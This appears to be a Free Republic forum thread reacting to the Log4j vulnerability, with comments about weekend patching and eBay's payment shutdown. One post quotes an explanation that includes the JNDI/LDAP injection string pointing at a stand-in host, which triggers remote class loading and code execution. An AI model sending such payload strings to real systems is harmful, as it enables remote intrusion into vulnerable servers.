Posted on 12/12/2021 9:08:33 PM PST by blueplum
The worst! IN HISTORY!
Good grief.
It’s the Omicron hack.
I know the programmers in my company spent a long Friday night doing code fixes for this. I wouldn’t be surprised if a lot of software across the US was taken down for repairs over the weekend.
Technical article on the exploit
The vulnerability is triggered by a simple string sent to a vulnerable server:
${jndi:ldap://example.com/a}
When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.
eBay sent an unusual email early Friday morning saying they were turning off their automatic payment system. The explanation was vague but it made me wonder if they were having an IT security issue.
Rd later.
I agree ... ‘java’ is for people who are not mentally sharp or disciplined enough to learn ‘c++’.
Let the firestorm ensue ...
bttt
You have my empathy. Teams in my division haven’t stopped since Thursday PM when the CVE published. This is a nasty one.
log4j bookmark
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.